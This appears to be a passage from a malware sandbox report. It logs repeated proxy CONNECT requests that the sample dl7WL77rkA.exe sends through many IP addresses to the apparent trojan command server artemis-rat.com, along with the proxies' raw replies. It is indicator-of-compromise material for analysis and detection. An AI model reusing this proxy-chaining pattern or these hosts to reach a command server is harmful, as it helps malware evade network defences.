                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.121524096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1562192.168.2.550163162.241.158.204529803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.121619940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.201778889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.202163935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.201958895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1563192.168.2.55418294.23.252.16891803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.122932911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1564192.168.2.55286651.75.122.80803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.125768900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.202020884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.214446068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.217273951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1565192.168.2.554171130.255.162.199203983876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.130609989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.889527082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.905319929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1566192.168.2.550153165.227.104.122299923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.133182049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.201910973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.202167034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.201977968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1567192.168.2.552795159.223.71.71618183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.144768000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.202044010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.214451075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.217273951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1568192.168.2.55419147.243.114.19281803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.148956060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.466634989 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1569192.168.2.55417320.206.106.19281233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.149629116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.472440004 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1570192.168.2.554281177.93.45.1549993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.151153088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796387911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702383995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.794872999 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1571192.168.2.554399172.67.182.3803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.159410954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.313966036 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1572192.168.2.55422220.205.61.143803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.162138939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.468919992 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1573192.168.2.554397104.238.111.10779993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.164700031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796206951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405407906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.572479963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.702205896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014607906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.202358961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.514554977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1574192.168.2.554407104.16.105.146803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.164951086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.319257021 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1575192.168.2.55417545.11.95.16550493876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.165889025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1576192.168.2.55420720.206.106.192803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.166353941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.491108894 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1577192.168.2.5542088.130.39.15533893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.167222023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.485606909 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
